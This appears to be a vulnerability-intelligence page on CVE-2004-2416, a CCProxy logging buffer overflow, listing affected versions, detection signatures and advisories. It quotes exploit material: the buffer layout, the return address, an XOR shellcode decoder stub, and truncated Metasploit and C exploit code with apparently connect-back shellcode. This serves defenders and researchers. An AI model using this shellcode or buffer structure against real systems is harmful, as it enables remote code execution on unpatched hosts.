CVE-2004-2416
published 2004-12-31CVE-2004-2416: Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
60.59%
99.0th percentile
Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| youngzsoft | ccproxy | <= 6.2 | — |
| youngzsoft | ccproxy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0x7ffa54cd (return address used in exploit buffer)
bytes↗
GET / <0x42 * N><shellcode><0xCD 0x54 0xFA 0x7F> HTTP/1.0\r\n\r\n (exploit HTTP request structure, total ~4065 bytes before HTTP trailer)
bytes↗
XOR-encoded shellcode stub: eb 0e 5b 4b 33 c9 b1 fe 80 34 0b ee e2 fa eb 05 e8 ed ff ff ff (decoder prefix)
- →Alert on HTTP GET requests to CCProxy (default port 808) where the request line length approaches or exceeds ~4065 bytes, indicative of the log stack-overflow exploit payload. ↗
- →Detect the exploit's characteristic buffer layout: 'GET /' followed by a long run of 0x42 bytes ('B') padding up to offset ~4065, then shellcode, then the return address 0x7FFA54CD. ↗
- →Detect the XOR-0xEE decoder stub in the HTTP request body as a byte signature: EB 0E 5B 4B 33 C9 B1 FE 80 34 0B EE E2 FA EB 05 E8 ED FF FF FF. ↗
- →Monitor CCProxy Telnet service (default port 23/8023) for oversized 'ping' command arguments; a legitimate ping target address should be short, so flag any ping argument exceeding a few hundred bytes. ↗
- →The exploit appends the HTTP/1.0 trailer bytes 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A after the overflow payload; presence of this sequence deep inside an oversized HTTP request is suspicious. ↗
- ·The exploit targets CCProxy versions up to and including 6.2; the return address 0x7FFA54CD is a well-known Windows universal JMP ESP address and may vary across OS patch levels, limiting reliability of that specific byte signature on patched systems. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qr26-8475-q4qg: Buffer overflow in YoungZSoft CCProxy 6
ghsa_unreviewed·2022-04-29·CVSS 7.5
CVE-2004-2685 [HIGH] CWE-119 GHSA-qr26-8475-q4qg: Buffer overflow in YoungZSoft CCProxy 6
Buffer overflow in YoungZSoft CCProxy 6.2 and earlier allows remote attackers to execute arbitrary code via a long address in a ping (p) command to the Telnet proxy service, a different vector than CVE-2004-2416.
GHSA
GHSA-frh6-f7hv-xxf5: Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request
ghsa_unreviewed·2022-04-29
CVE-2004-2416 [HIGH] GHSA-frh6-f7hv-xxf5: Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request
Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.
No detection rules found.
Exploit-DB
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
exploitdb·2007-09-03
CVE-2004-2685 CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
---
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CCProxy %q{
This module exploits the YoungZSoft CCProxy [ 'Patrick Webster ' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Pa
Exploit-DB
CCProxy Log - Remote Stack Overflow
exploitdb·2004-11-09
CVE-2004-2416 CCProxy Log - Remote Stack Overflow
CCProxy Log - Remote Stack Overflow
---
#include
#include
#include
#pragma comment(lib, "ws2_32")
unsigned char EndChar[]=
"x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A";
// HTTP/1.0
unsigned char shellcode[] =
"xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"
"xe8xedxffxffxff"
/* 254 bytes shellcode, xor with 0xee */
/* offset 92=IP offset 99=PORT*/
"x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
"x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee"
"x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b"
"x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef"
"x84xecx11xb8xfex7dx86x91xeexeexefx86xecxeexeexdb"
"x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84"
"xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45"
"x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf"
"xbfxbfx84xefxbfxbfxbbxbfx1
Metasploit
CCProxy Telnet Proxy Ping Overflow
metasploit
CCProxy Telnet Proxy Ping Overflow
CCProxy Telnet Proxy Ping Overflow
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.
No writeups or analysis indexed.
http://secunia.com/advisories/13085http://securitytracker.com/id?1012189http://www.osvdb.org/11593http://www.securiteam.com/exploits/6E0032KBPM.htmlhttp://www.securityfocus.com/bid/11666https://exchange.xforce.ibmcloud.com/vulnerabilities/18012http://secunia.com/advisories/13085http://securitytracker.com/id?1012189http://www.osvdb.org/11593http://www.securiteam.com/exploits/6E0032KBPM.htmlhttp://www.securityfocus.com/bid/11666https://exchange.xforce.ibmcloud.com/vulnerabilities/18012
2004-12-31
Published